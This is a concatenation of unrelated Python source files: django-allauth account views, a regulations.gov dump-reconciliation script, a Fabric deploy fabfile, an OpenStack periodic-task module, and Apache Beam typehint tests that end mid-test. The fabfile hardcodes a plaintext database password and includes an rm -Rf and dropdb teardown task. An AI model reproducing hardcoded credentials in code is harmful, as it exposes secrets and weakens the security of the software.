confirm_email = ConfirmEmailView.as_view() class EmailView(AjaxCapableProcessFormViewMixin, FormView): template_name = "account/email.html" form_class = AddEmailForm success_url = reverse_lazy('account_email') def get_form_class(self): return get_form_class(app_settings.FORMS, 'add_email', self.form_class) def dispatch(self, request, *args, **kwargs): sync_user_email_addresses(request.user) return super(EmailView, self).dispatch(request, *args, **kwargs) def get_form_kwargs(self): kwargs = super(EmailView, self).get_form_kwargs() kwargs["user"] = self.request.user return kwargs def form_valid(self, form): email_address = form.save(self.request) get_adapter().add_message(self.request, messages.INFO, 'account/messages/' 'email_confirmation_sent.txt', {'email': form.cleaned_data["email"]}) signals.email_added.send(sender=self.request.user.__class__, request=self.request, user=self.request.user, email_address=email_address) return super(EmailView, self).form_valid(form) def post(self, request, *args, **kwargs): res = None if "action_add" in request.POST: res = super(EmailView, self).post(request, *args, **kwargs) elif request.POST.get("email"): if "action_send" in request.POST: res = self._action_send(request) elif "action_remove" in request.POST: res = 
self._action_remove(request) elif "action_primary" in request.POST: res = self._action_primary(request) res = res or HttpResponseRedirect(reverse('account_email')) # Given that we bypassed AjaxCapableProcessFormViewMixin, # we'll have to call invoke it manually... res = _ajax_response(request, res) else: # No email address selected res = HttpResponseRedirect(reverse('account_email')) res = _ajax_response(request, res) return res def _action_send(self, request, *args, **kwargs): email = request.POST["email"] try: email_address = EmailAddress.objects.get( user=request.user, email=email, ) get_adapter().add_message(request, messages.INFO, 'account/messages/' 'email_confirmation_sent.txt', {'email': email}) email_address.send_confirmation(request) return HttpResponseRedirect(self.get_success_url()) except EmailAddress.DoesNotExist: pass def _action_remove(self, request, *args, **kwargs): email = request.POST["email"] try: email_address = EmailAddress.objects.get( user=request.user, email=email ) if email_address.primary: get_adapter().add_message(request, messages.ERROR, 'account/messages/' 'cannot_delete_primary_email.txt', {"email": email}) else: email_address.delete() signals.email_removed.send(sender=request.user.__class__, request=request, user=request.user, email_address=email_address) get_adapter().add_message(request, messages.SUCCESS, 'account/messages/email_deleted.txt', {"email": email}) return HttpResponseRedirect(self.get_success_url()) except EmailAddress.DoesNotExist: pass def _action_primary(self, request, *args, **kwargs): email = request.POST["email"] try: email_address = EmailAddress.objects.get_for_user( user=request.user, email=email ) # Not primary=True -- Slightly different variation, don't # require verified unless moving from a verified # address. Ignore constraint if previous primary email # address is not verified. if not email_address.verified and \ EmailAddress.objects.filter(user=request.user, verified=True).exists(): get_adapter().add_message(request, messages.ERROR, 'account/messages/' 'unverified_primary_email.txt') else: # Sending the old primary address to the signal # adds a db query. 
try: from_email_address = EmailAddress.objects \ .get(user=request.user, primary=True) except EmailAddress.DoesNotExist: from_email_address = None email_address.set_as_primary() get_adapter() \ .add_message(request, messages.SUCCESS, 'account/messages/primary_email_set.txt') signals.email_changed \ .send(sender=request.user.__class__, request=request, user=request.user, from_email_address=from_email_address, to_email_address=email_address) return HttpResponseRedirect(self.get_success_url()) except EmailAddress.DoesNotExist: pass def get_context_data(self, **kwargs): ret = super(EmailView, self).get_context_data(**kwargs) # NOTE: For backwards compatibility ret['add_email_form'] = ret.get('form') # (end NOTE) return ret email = login_required(EmailView.as_view()) class PasswordChangeView(AjaxCapableProcessFormViewMixin, FormView): template_name = "account/password_change.html" form_class = ChangePasswordForm success_url = reverse_lazy("account_change_password") def get_form_class(self): return get_form_class(app_settings.FORMS, 'change_password', self.form_class) @sensitive_post_parameters_m def dispatch(self, request, *args, **kwargs): if not request.user.has_usable_password(): return HttpResponseRedirect(reverse('account_set_password')) return super(PasswordChangeView, self).dispatch(request, *args, **kwargs) def get_form_kwargs(self): kwargs = super(PasswordChangeView, self).get_form_kwargs() kwargs["user"] = self.request.user return kwargs def form_valid(self, form): form.save() if (update_session_auth_hash is not None and not app_settings.LOGOUT_ON_PASSWORD_CHANGE): update_session_auth_hash(self.request, form.user) get_adapter().add_message(self.request, messages.SUCCESS, 'account/messages/password_changed.txt') signals.password_changed.send(sender=self.request.user.__class__, request=self.request, user=self.request.user) return super(PasswordChangeView, self).form_valid(form) def get_context_data(self, **kwargs): ret = super(PasswordChangeView, self).get_context_data(**kwargs) # NOTE: For backwards compatibility ret['password_change_form'] = ret.get('form') # (end NOTE) return ret password_change = login_required(PasswordChangeView.as_view()) class PasswordSetView(AjaxCapableProcessFormViewMixin, FormView): template_name = "account/password_set.html" form_class = SetPasswordForm success_url = reverse_lazy("account_set_password") def get_form_class(self): return get_form_class(app_settings.FORMS, 'set_password', self.form_class) @sensitive_post_parameters_m def dispatch(self, request, *args, **kwargs): if request.user.has_usable_password(): return HttpResponseRedirect(reverse('account_change_password')) return super(PasswordSetView, self).dispatch(request, *args, **kwargs) def get_form_kwargs(self): kwargs = super(PasswordSetView, self).get_form_kwargs() kwargs["user"] = self.request.user return kwargs def form_valid(self, form): form.save() get_adapter().add_message(self.request, messages.SUCCESS, 'account/messages/password_set.txt') signals.password_set.send(sender=self.request.user.__class__, request=self.request, user=self.request.user) return super(PasswordSetView, self).form_valid(form) def get_context_data(self, **kwargs): ret = super(PasswordSetView, self).get_context_data(**kwargs) # NOTE: For backwards compatibility ret['password_set_form'] = ret.get('form') # (end NOTE) return ret password_set = login_required(PasswordSetView.as_view()) class PasswordResetView(AjaxCapableProcessFormViewMixin, FormView): template_name = "account/password_reset.html" form_class = 
ResetPasswordForm success_url = reverse_lazy("account_reset_password_done") def get_form_class(self): return get_form_class(app_settings.FORMS, 'reset_password', self.form_class) def form_valid(self, form): form.save(self.request) return super(PasswordResetView, self).form_valid(form) def get_context_data(self, **kwargs): ret = super(PasswordResetView, self).get_context_data(**kwargs) # NOTE: For backwards compatibility ret['password_reset_form'] = ret.get('form') # (end NOTE) return ret password_reset = PasswordResetView.as_view() class PasswordResetDoneView(TemplateView): template_name = "account/password_reset_done.html" password_reset_done = PasswordResetDoneView.as_view() class PasswordResetFromKeyView(AjaxCapableProcessFormViewMixin, FormView): template_name = "account/password_reset_from_key.html" form_class = ResetPasswordKeyForm success_url = reverse_lazy("account_reset_password_from_key_done") def get_form_class(self): return get_form_class(app_settings.FORMS, 'reset_password_from_key', self.form_class) def dispatch(self, request, uidb36, key, **kwargs): self.request = request self.key = key # (Ab)using forms here to be able to handle errors in XHR #890 token_form = UserTokenForm(data={'uidb36': uidb36, 'key': key}) if not token_form.is_valid(): response = self.render_to_response( self.get_context_data(token_fail=True) ) return _ajax_response(self.request, response, form=token_form) else: self.reset_user = token_form.reset_user return super(PasswordResetFromKeyView, self).dispatch(request, uidb36, key, **kwargs) def get_form_kwargs(self): kwargs = super(PasswordResetFromKeyView, self).get_form_kwargs() kwargs["user"] = self.reset_user kwargs["temp_key"] = self.key return kwargs def form_valid(self, form): form.save() get_adapter().add_message(self.request, messages.SUCCESS, 'account/messages/password_changed.txt') signals.password_reset.send(sender=self.reset_user.__class__, request=self.request, user=self.reset_user) if app_settings.LOGIN_ON_PASSWORD_RESET: return perform_login(self.request, self.reset_user, email_verification=app_settings.EMAIL_VERIFICATION) return super(PasswordResetFromKeyView, self).form_valid(form) password_reset_from_key = PasswordResetFromKeyView.as_view() class PasswordResetFromKeyDoneView(TemplateView): template_name = "account/password_reset_from_key_done.html" password_reset_from_key_done = PasswordResetFromKeyDoneView.as_view() class LogoutView(TemplateResponseMixin, View): template_name = "account/logout.html" redirect_field_name = "next" def get(self, *args, **kwargs): if app_settings.LOGOUT_ON_GET: return self.post(*args, **kwargs) if not self.request.user.is_authenticated(): return redirect(self.get_redirect_url()) ctx = self.get_context_data() return self.render_to_response(ctx) def post(self, *args, **kwargs): url = self.get_redirect_url() if self.request.user.is_authenticated(): self.logout() return redirect(url) def logout(self): get_adapter().add_message(self.request, messages.SUCCESS, 'account/messages/logged_out.txt') auth_logout(self.request) def get_context_data(self, **kwargs): ctx = kwargs redirect_field_value = get_request_param(self.request, self.redirect_field_name) ctx.update({ "redirect_field_name": self.redirect_field_name, "redirect_field_value": redirect_field_value}) return ctx def get_redirect_url(self): return (get_next_redirect_url(self.request, self.redirect_field_name) or get_adapter().get_logout_redirect_url(self.request)) logout = LogoutView.as_view() class AccountInactiveView(TemplateView): template_name = 
'account/account_inactive.html'

account_inactive = AccountInactiveView.as_view()


class EmailVerificationSentView(TemplateView):
    template_name = 'account/verification_sent.html'

email_verification_sent = EmailVerificationSentView.as_view()
GEVENT = False import os import settings import sys from search import parse, iter_parse, result_to_model import pytz import datetime import operator import time import json import re from regs_common.tmp_redis import TmpRedis from regs_common.mp_types import Counter from regs_common.util import listify from regsdotgov.document import make_view from regs_models import * import multiprocessing from Queue import Empty from optparse import OptionParser arg_parser = OptionParser() arg_parser.add_option("-m", "--multi", dest="multi", action="store", type="int", default=multiprocessing.cpu_count(), help="Set number of worker processes. Defaults to number of cores if not specified.") arg_parser.add_option("-k", "--keep-cache", dest="keep_cache", action="store_true", default=False, help="Prevents the cache from being deleted at the end of processing to make testing faster.") arg_parser.add_option("-u", "--use-cache", dest="use_cache", action="store", default=None, help="Use pre-existing cache to make testing faster.") arg_parser.add_option("-A", "--add-only", dest="add_only", action="store_true", default=False, help="Skip reconciliation, assume that all records are new, and go straight to the add step.") arg_parser.add_option("-a", "--agency", dest="agency", action="store", type="string", default=None, help="Specify an agency to which to limit the dump.") arg_parser.add_option("-d", "--docket", dest="docket", action="store", type="string", default=None, help="Specify a docket to which to limit the dump.") def repair_views(old_views, new_views): for new_view in new_views: already_exists = [view for view in old_views if view.type == new_view.type] if not already_exists: old_views.append(new_view) elif already_exists and already_exists[0].downloaded == 'failed': already_exists[0].downloaded = "no" def reconcile_process(record, cache, db, now, repaired_counter, updated_counter, deleted_counter): # check and see if this doc has been updated new_record = cache.get(record['_id']) if new_record: # do we need to fix anything? 
statuses = [[view['downloaded'] for view in record.get('views', [])]] + [[view['downloaded'] for view in attachment.get('views', [])] for attachment in record.get('attachments', [])] #main_views = [make_view(format) for format in listify(new_record.get('fileFormats', []))] if record['scraped'] == 'failed' or 'failed' in reduce(operator.add, statuses, []) or (record['scraped'] == 'yes' and len(record.get('attachments', [])) != new_record.get('attachmentCount', 0)): # needs a repair; grab the full document current_docs = Doc.objects(id=record['_id']) db_doc = current_docs[0] db_doc.scraped = "no" # rebuild views #repair_views(db_doc.views, main_views) # update the last-seen date db_doc.last_seen = now # reset a couple of flags to trigger reprocessing db_doc.in_search_index = False db_doc.in_cluster_db = False db_doc.entities_last_extracted = None # do save try: db_doc.save() repaired_counter.increment() except: print "Failed to repair %s" % db_doc.id else: # we don't need a full repair, so just do an update on the date Doc.objects(id=record['_id']).update_one(set__last_seen=now) updated_counter.increment() # either way, delete the document from the cache so we can tell what's new at the end cache.delete(record['_id']) else: # this document isn't in the new data anymore, so mark it deleted Doc.objects(id=record['_id']).update_one(set__deleted=True) deleted_counter.increment() def reconcile_worker(todo_queue, cache_wrapper, now, repaired_counter, updated_counter, deleted_counter): pid = os.getpid() print '[%s] Reconciliation worker started.' % pid cache = cache_wrapper.get_pickle_connection() import pymongo db = pymongo.Connection(**settings.DB_SETTINGS)[settings.DB_NAME] while True: record = todo_queue.get() reconcile_process(record, cache, db, now, repaired_counter, updated_counter, deleted_counter) todo_queue.task_done() def add_new_docs(cache_wrapper, now): print 'Adding new documents to the database...' cache = cache_wrapper.get_pickle_connection() new = 0 for id in cache.keys(): doc = cache.get(id) if doc.get('documentStatus', None) == "Withdrawn": continue db_doc = result_to_model(doc, now=now) try: db_doc.save() new += 1 except: print "Failed to save document %s" % db_doc.id written = new print 'Wrote %s new documents.' % (written) return written def reconcile_dumps(options, cache_wrapper, now): sys.stdout.write('Reconciling dumps with current data...\n') sys.stdout.flush() # get workers going num_workers = options.multi todo_queue = multiprocessing.JoinableQueue(num_workers * 3) repaired_counter = Counter() updated_counter = Counter() deleted_counter = Counter() processes = [] for i in range(num_workers): proc = multiprocessing.Process(target=reconcile_worker, args=(todo_queue, cache_wrapper, now, repaired_counter, updated_counter, deleted_counter)) proc.start() processes.append(proc) import pymongo db = pymongo.Connection(**settings.DB_SETTINGS)[settings.DB_NAME] conditions = {'last_seen': {'$lt': now}, 'deleted': False, 'source': 'regulations.gov'} if options.agency: conditions['agency'] = options.agency if options.docket: conditions['docket_id'] = options.docket fields = {'_id': 1, 'scraped': 1, 'views.downloaded': 1, 'views.type': 1, 'attachments.views.downloaded': 1, 'attachments.views.type': 1, 'attachments.object_id': 1} to_check = db.docs.find(conditions, fields) while True: try: record = to_check.next() except pymongo.errors.OperationFailure: print 'OH NOES!' 
            # the cursor died; recreate it and retry (this was previously assigned to an
            # unused 'to_scrape' variable, which left the loop stuck on the dead cursor)
            to_check = db.docs.find(conditions, fields)
            continue
        except StopIteration:
            break

        todo_queue.put(record)

    todo_queue.join()

    for proc in processes:
        print 'Terminating reconciliation worker %s...' % proc.pid
        proc.terminate()

    # compile and print some stats
    num_updated = updated_counter.value
    num_repaired = repaired_counter.value
    num_deleted = deleted_counter.value
    num_docs = num_updated + num_repaired + num_deleted

    print 'Reconciliation complete: examined %s documents, of which %s were updated, %s were repaired, and %s were flagged as deleted.' % (num_docs, num_updated, num_repaired, num_deleted)

    return {'updated': num_updated, 'repaired': num_repaired, 'deleted': num_deleted}


def parser_process(file, cache):
    docs = iter_parse(os.path.join(settings.DUMP_DIR, file))
    print '[%s] Done with JSON decode.' % os.getpid()

    count = 0
    for doc in docs:
        cache.set(doc['documentId'], doc)
        count += 1

    return {'docs': count}


def parser_worker(todo_queue, done_queue, cache_wrapper):
    pid = os.getpid()
    print '[%s] Parser worker started.' % pid

    cache = cache_wrapper.get_pickle_connection()

    while True:
        file = todo_queue.get()

        sys.stdout.write('[%s] Parsing file %s...\n' % (pid, file))
        sys.stdout.flush()

        start = datetime.datetime.now()
        stats = parser_process(file, cache)
        elapsed = datetime.datetime.now() - start

        sys.stdout.write('[%s] Done with %s in %s minutes\n' % (pid, file, round(elapsed.total_seconds() / 60.0)))
        sys.stdout.flush()

        done_queue.put(stats)
        todo_queue.task_done()


def parse_dumps(options, cache_wrapper):
    # figure out which files are ours
    id_string = 'all'
    if options.agency and options.docket:
        raise Exception("Specify either an agency or a docket")
    elif options.agency:
        id_string = 'agency_' + options.agency
    elif options.docket:
        id_string = 'docket_' + options.docket.replace('-', '_')

    num_workers = options.multi
    files = [file for file in os.listdir(settings.DUMP_DIR) if file.startswith('dump_%s' % id_string) and file.endswith('.json')]

    if len(files) < 1:
        # something is wrong, as there should be more than ten files
        raise Exception('Too few .json files; something went wrong.')

    # it's a small number of files, so just make a queue big enough to hold them all, to keep from having to block
    todo_queue = multiprocessing.JoinableQueue(len(files))
    done_queue = multiprocessing.Queue(len(files))

    sys.stdout.write('Starting parser workers...\n')
    processes = []
    for i in range(num_workers):
        proc = multiprocessing.Process(target=parser_worker, args=(todo_queue, done_queue, cache_wrapper))
        proc.start()
        processes.append(proc)

    for file in files:
        todo_queue.put(file)

    todo_queue.join()

    for proc in processes:
        print 'Terminating parser worker %s...' % proc.pid
        proc.terminate()

    # print totals
    print 'Done parsing files.'


def run(options, args):
    sys.stdout.write('Starting decoding...\n')
    sys.stdout.flush()

    # get workers going
    now = datetime.datetime.now(tz=pytz.utc)
    num_workers = options.multi

    # set up caching
    sys.stdout.write('Spinning up Redis instance...\n')
    if options.use_cache:
        cache_wrapper = TmpRedis(db_uuid=options.use_cache)
        # give it time to rebuild its cache from disk if we're using an already-built cache
        sys.stdout.write('Loading cache from disk...')
        time.sleep(15)
        sys.stdout.write(' done.\n')
    else:
        cache_wrapper = TmpRedis()

    parse_dumps(options, cache_wrapper)

    stats = {}
    if not options.add_only:
        stats = reconcile_dumps(options, cache_wrapper, now)
    else:
        print 'Skipping reconciliation step.'
    # still-existing and deleted stuff is now done, but we still have to do the new stuff
    stats['new'] = add_new_docs(cache_wrapper, now)

    sys.stdout.write('Terminating Redis cache...\n')

    if options.keep_cache:
        cache_wrapper.terminate(delete=False)
        print 'Cache preserved with UUID %s.' % cache_wrapper.uuid
    else:
        cache_wrapper.terminate()

    return stats
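
# --- Illustrative entry point (not part of the original module) ---
# A minimal sketch of how this script could be driven directly: parse the OptionParser
# flags defined at the top of the file and hand the result to run(). The real project
# may invoke run() through its own task runner, so treat this wiring as an assumption.
if __name__ == '__main__':
    options, args = arg_parser.parse_args()
    dump_stats = run(options, args)
    print 'Dump load finished: %s' % dump_stats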
#!/usr/bin/env python from fabric.api import * """ Base configuration """ env.project_name = 'hacktyler_crime' env.database_password = 'qw8ndyHprt' env.path = '/home/ubuntu/src/%(project_name)s' % env env.log_path = '/var/log/src/%(project_name)s' % env env.env_path = '/home/ubuntu/.virtualenvs/%(project_name)s' % env env.repo_path = '%(path)s' % env env.server_config_path = '/etc/nginx/sites-enabled/%(project_name)s' % env env.python = 'python2.7' env.repository_url = "git@github.com:hacktyler/hacktyler_crime.git" env.user = 'ubuntu' env.hosts = ['hasufel.hacktyler.com'] """ Branches """ def stable(): """ Work on stable branch. """ env.branch = 'stable' def master(): """ Work on development branch. """ env.branch = 'master' def branch(branch_name): """ Work on any specified branch. """ env.branch = branch_name """ Commands - setup """ def setup(): """ Setup a fresh virtualenv, install everything we need, and fire up the database. """ require('branch', provided_by=[stable, master, branch]) setup_directories() setup_virtualenv() clone_repo() checkout_latest() install_requirements() destroy_database() create_database() syncdb() install_server_conf() collect_static_files() reload_app(); def setup_directories(): """ Create directories necessary for deployment. """ run('mkdir -p %(path)s' % env) sudo('mkdir -p /var/log/sites/%(project_name)s/' % env, user='uwsgi') sudo('touch /var/log/sites/hacktyler_crime/hacktyler_crime.log', user='uwsgi') def setup_virtualenv(): """ Setup a fresh virtualenv. """ run('virtualenv -p %(python)s --no-site-packages %(env_path)s;' % env) run('source %(env_path)s/bin/activate;' % env) def clone_repo(): """ Do initial clone of the git repository. """ run('git clone %(repository_url)s %(repo_path)s' % env) def checkout_latest(): """ Pull the latest code on the specified branch. """ run('cd %(repo_path)s; git checkout %(branch)s; git pull origin %(branch)s' % env) def install_requirements(): """ Install the required packages using pip. """ run('source %(env_path)s/bin/activate; pip install -r %(repo_path)s/requirements.txt' % env) def install_server_conf(): """ Install the server config file. """ sudo('ln -s %(repo_path)s/config/deployed/nginx %(server_config_path)s' % env) sudo('ln -s %(repo_path)s/config/deployed/uwsgi.conf /etc/init/%(project_name)s.conf' % env) sudo('initctl reload-configuration' % env) """ Commands - deployment """ def deploy(): """ Deploy the latest version of the site to the server and restart the web server. Does not perform the functions of load_new_data(). """ require('branch', provided_by=[stable, master, branch]) checkout_latest() collect_static_files() reload_app() def collect_static_files(): """ Collect static files on the server. """ sudo('cd %(repo_path)s; %(env_path)s/bin/python manage.py collectstatic --noinput' % env, user="uwsgi") def reload_app(): """ Restart the uwsgi server. """ sudo('service %(project_name)s restart' % env) def update_requirements(): """ Update the installed dependencies the server. """ run('source %(env_path)s/bin/activate; pip install -q -U -r %(repo_path)s/requirements.txt' % env) """ Commands - data """ def reset_database(): """ Drop and recreate the project database. """ pgpool_down() destroy_database() create_database() syncdb() pgpool_up() def create_database(): """ Creates the user and database for this project. 
""" sudo('echo "CREATE USER %(project_name)s WITH PASSWORD \'%(database_password)s\';" | psql postgres' % env, user='postgres') sudo('createdb -T template_postgis -O %(project_name)s %(project_name)s' % env, user='postgres') def destroy_database(): """ Destroys the user and database for this project. Will not cause the fab to fail if they do not exist. """ pgpool_down() with settings(warn_only=True): sudo('dropdb %(project_name)s' % env, user='postgres') sudo('dropuser %(project_name)s' % env, user='postgres') pgpool_up() def syncdb(): """ Sync the Django models to the database. """ sudo('cd %(repo_path)s; %(env_path)s/bin/python manage.py syncdb --noinput' % env, user="uwsgi") def pgpool_down(): """ Stop pgpool so that it won't prevent the database from being rebuilt. """ sudo('service pgpool2 stop') def pgpool_up(): """ Start pgpool. """ sudo('service pgpool2 start') """ Commands - local """ def local_reset(): """ Reset the local database and Solr instance. """ local_reset_database() def local_reset_database(): """ Reset the local database. """ with settings(warn_only=True): local('dropdb %(project_name)s' % env) #local('dropuser %(project_name)s' % env) #local('echo "CREATE USER %(project_name)s WITH PASSWORD \'%(database_password)s\';" | psql postgres' % env) local('createdb -O %(project_name)s %(project_name)s -T template_postgis' % env) local('python manage.py syncdb --noinput' % env) """ Deaths, destroyers of worlds """ def shiva_the_destroyer(): """ Remove all directories, databases, etc. associated with the application. """ with settings(warn_only=True): run('rm -Rf %(path)s' % env) run('rm -Rf %(log_path)s' % env) run('rm -Rf %(env_path)s' % env) pgpool_down() run('dropdb %(project_name)s' % env) run('dropuser %(project_name)s' % env) pgpool_up() sudo('rm %(server_config_path)s' % env) reload_app()
# # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy import random import time from oslo.config import cfg import six from neutron_vpnaas.openstack.common._i18n import _, _LE, _LI from neutron_vpnaas.openstack.common import log as logging periodic_opts = [ cfg.BoolOpt('run_external_periodic_tasks', default=True, help='Some periodic tasks can be run in a separate process. ' 'Should we run them here?'), ] CONF = cfg.CONF CONF.register_opts(periodic_opts) LOG = logging.getLogger(__name__) DEFAULT_INTERVAL = 60.0 def list_opts(): """Entry point for oslo.config-generator.""" return [(None, copy.deepcopy(periodic_opts))] class InvalidPeriodicTaskArg(Exception): message = _("Unexpected argument for periodic task creation: %(arg)s.") def periodic_task(*args, **kwargs): """Decorator to indicate that a method is a periodic task. This decorator can be used in two ways: 1. Without arguments '@periodic_task', this will be run on the default interval of 60 seconds. 2. With arguments: @periodic_task(spacing=N [, run_immediately=[True|False]]) this will be run on approximately every N seconds. If this number is negative the periodic task will be disabled. If the run_immediately argument is provided and has a value of 'True', the first run of the task will be shortly after task scheduler starts. If run_immediately is omitted or set to 'False', the first time the task runs will be approximately N seconds after the task scheduler starts. """ def decorator(f): # Test for old style invocation if 'ticks_between_runs' in kwargs: raise InvalidPeriodicTaskArg(arg='ticks_between_runs') # Control if run at all f._periodic_task = True f._periodic_external_ok = kwargs.pop('external_process_ok', False) if f._periodic_external_ok and not CONF.run_external_periodic_tasks: f._periodic_enabled = False else: f._periodic_enabled = kwargs.pop('enabled', True) # Control frequency f._periodic_spacing = kwargs.pop('spacing', 0) f._periodic_immediate = kwargs.pop('run_immediately', False) if f._periodic_immediate: f._periodic_last_run = None else: f._periodic_last_run = time.time() return f # NOTE(sirp): The `if` is necessary to allow the decorator to be used with # and without parenthesis. # # In the 'with-parenthesis' case (with kwargs present), this function needs # to return a decorator function since the interpreter will invoke it like: # # periodic_task(*args, **kwargs)(f) # # In the 'without-parenthesis' case, the original function will be passed # in as the first argument, like: # # periodic_task(f) if kwargs: return decorator else: return decorator(args[0]) class _PeriodicTasksMeta(type): def __init__(cls, names, bases, dict_): """Metaclass that allows us to collect decorated periodic tasks.""" super(_PeriodicTasksMeta, cls).__init__(names, bases, dict_) # NOTE(sirp): if the attribute is not present then we must be the base # class, so, go ahead an initialize it. If the attribute is present, # then we're a subclass so make a copy of it so we don't step on our # parent's toes. 
try: cls._periodic_tasks = cls._periodic_tasks[:] except AttributeError: cls._periodic_tasks = [] try: cls._periodic_spacing = cls._periodic_spacing.copy() except AttributeError: cls._periodic_spacing = {} for value in cls.__dict__.values(): if getattr(value, '_periodic_task', False): task = value name = task.__name__ if task._periodic_spacing < 0: LOG.info(_LI('Skipping periodic task %(task)s because ' 'its interval is negative'), {'task': name}) continue if not task._periodic_enabled: LOG.info(_LI('Skipping periodic task %(task)s because ' 'it is disabled'), {'task': name}) continue # A periodic spacing of zero indicates that this task should # be run on the default interval to avoid running too # frequently. if task._periodic_spacing == 0: task._periodic_spacing = DEFAULT_INTERVAL cls._periodic_tasks.append((name, task)) cls._periodic_spacing[name] = task._periodic_spacing def _nearest_boundary(last_run, spacing): """Find nearest boundary which is in the past, which is a multiple of the spacing with the last run as an offset. Eg if last run was 10 and spacing was 7, the new last run could be: 17, 24, 31, 38... 0% to 5% of the spacing value will be added to this value to ensure tasks do not synchronize. This jitter is rounded to the nearest second, this means that spacings smaller than 20 seconds will not have jitter. """ current_time = time.time() if last_run is None: return current_time delta = current_time - last_run offset = delta % spacing # Add up to 5% jitter jitter = int(spacing * (random.random() / 20)) return current_time - offset + jitter @six.add_metaclass(_PeriodicTasksMeta) class PeriodicTasks(object): def __init__(self): super(PeriodicTasks, self).__init__() self._periodic_last_run = {} for name, task in self._periodic_tasks: self._periodic_last_run[name] = task._periodic_last_run def run_periodic_tasks(self, context, raise_on_error=False): """Tasks to be run at a periodic interval.""" idle_for = DEFAULT_INTERVAL for task_name, task in self._periodic_tasks: full_task_name = '.'.join([self.__class__.__name__, task_name]) spacing = self._periodic_spacing[task_name] last_run = self._periodic_last_run[task_name] # Check if due, if not skip idle_for = min(idle_for, spacing) if last_run is not None: delta = last_run + spacing - time.time() if delta > 0: idle_for = min(idle_for, delta) continue LOG.debug("Running periodic task %(full_task_name)s", {"full_task_name": full_task_name}) self._periodic_last_run[task_name] = _nearest_boundary( last_run, spacing) try: task(self, context) except Exception as e: if raise_on_error: raise LOG.exception(_LE("Error during %(full_task_name)s: %(e)s"), {"full_task_name": full_task_name, "e": e}) time.sleep(0) return idle_for
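
# --- Usage sketch (illustrative, not part of the module) ---
# Demonstrates the two decorator styles described in periodic_task's docstring.
# The manager class and the bare `context=None` below are hypothetical stand-ins,
# kept under __main__ so importing this module is unaffected.
if __name__ == '__main__':

    class _ExamplePeriodicManager(PeriodicTasks):

        @periodic_task
        def _report_state(self, context):
            # Bare decorator: runs on the DEFAULT_INTERVAL (60 s) schedule; the first
            # run lands roughly one interval after the method is decorated.
            pass

        @periodic_task(spacing=10, run_immediately=True)
        def _poll_backends(self, context):
            # Parameterized form: runs about every 10 seconds, with the first run
            # shortly after the scheduler starts calling run_periodic_tasks().
            pass

    # A driving loop sleeps for whatever run_periodic_tasks() reports as safe.
    manager = _ExamplePeriodicManager()
    for _ in range(3):
        idle_for = manager.run_periodic_tasks(context=None)
        time.sleep(min(idle_for, 1))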
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """Unit tests for the type-hint objects and decorators.""" import inspect import unittest import apache_beam as beam from apache_beam import pvalue from apache_beam import typehints from apache_beam.test_pipeline import TestPipeline from apache_beam.transforms.util import assert_that, equal_to from apache_beam.typehints import WithTypeHints from apache_beam.utils.pipeline_options import OptionsContext # These test often construct a pipeline as value | PTransform to test side # effects (e.g. errors). # pylint: disable=expression-not-assigned class MainInputTest(unittest.TestCase): def test_bad_main_input(self): @typehints.with_input_types(str, int) def repeat(s, times): return s * times with self.assertRaises(typehints.TypeCheckError): [1, 2, 3] | beam.Map(repeat, 3) def test_non_function(self): result = ['a', 'bb', 'c'] | beam.Map(str.upper) self.assertEqual(['A', 'BB', 'C'], sorted(result)) result = ['xa', 'bbx', 'xcx'] | beam.Map(str.strip, 'x') self.assertEqual(['a', 'bb', 'c'], sorted(result)) result = ['1', '10', '100'] | beam.Map(int) self.assertEqual([1, 10, 100], sorted(result)) result = ['1', '10', '100'] | beam.Map(int, 16) self.assertEqual([1, 16, 256], sorted(result)) with self.assertRaises(typehints.TypeCheckError): [1, 2, 3] | beam.Map(str.upper) def test_loose_bounds(self): @typehints.with_input_types(typehints.Union[int, float, long]) @typehints.with_output_types(basestring) def format_number(x): return '%g' % x result = [1, 2, 3] | beam.Map(format_number) self.assertEqual(['1', '2', '3'], sorted(result)) def test_typed_dofn_class(self): @typehints.with_input_types(int) @typehints.with_output_types(str) class MyDoFn(beam.DoFn): def process(self, element): return [str(element)] result = [1, 2, 3] | beam.ParDo(MyDoFn()) self.assertEqual(['1', '2', '3'], sorted(result)) with self.assertRaises(typehints.TypeCheckError): ['a', 'b', 'c'] | beam.ParDo(MyDoFn()) with self.assertRaises(typehints.TypeCheckError): [1, 2, 3] | (beam.ParDo(MyDoFn()) | 'again' >> beam.ParDo(MyDoFn())) def test_typed_dofn_instance(self): class MyDoFn(beam.DoFn): def process(self, element): return [str(element)] my_do_fn = MyDoFn().with_input_types(int).with_output_types(str) result = [1, 2, 3] | beam.ParDo(my_do_fn) self.assertEqual(['1', '2', '3'], sorted(result)) with self.assertRaises(typehints.TypeCheckError): ['a', 'b', 'c'] | beam.ParDo(my_do_fn) with self.assertRaises(typehints.TypeCheckError): [1, 2, 3] | (beam.ParDo(my_do_fn) | 'again' >> beam.ParDo(my_do_fn)) class SideInputTest(unittest.TestCase): def _run_repeat_test(self, repeat): self._run_repeat_test_good(repeat) self._run_repeat_test_bad(repeat) @OptionsContext(pipeline_type_check=True) def _run_repeat_test_good(self, repeat): # As a positional argument. 
